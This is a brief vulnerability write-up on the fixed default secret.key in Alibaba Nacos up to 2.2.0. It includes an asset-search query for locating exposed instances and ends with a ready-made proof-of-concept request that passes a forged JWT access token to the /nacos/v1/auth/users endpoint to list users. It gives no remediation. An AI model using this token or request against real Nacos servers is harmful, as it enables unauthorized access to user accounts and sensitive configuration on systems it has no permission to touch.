Alibaba Nacos Secret Key Default Key Unauthorized Access Vulnerability

Alibaba Nacos secret.key default key Unauthorized access vulnerability

Vulnerability Description

Alibaba Nacos uses a fixed secret.key default key, causing attackers to construct requests to obtain sensitive information, resulting in unauthorized access vulnerabilities

Vulnerability Impact

Alibaba Nacos <= 2.2.0

Network surveying and mapping

app=”NACOS”

Vulnerability reappears

Login page

The cause of the vulnerability is due to the use of a fixed key

Verify POC

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9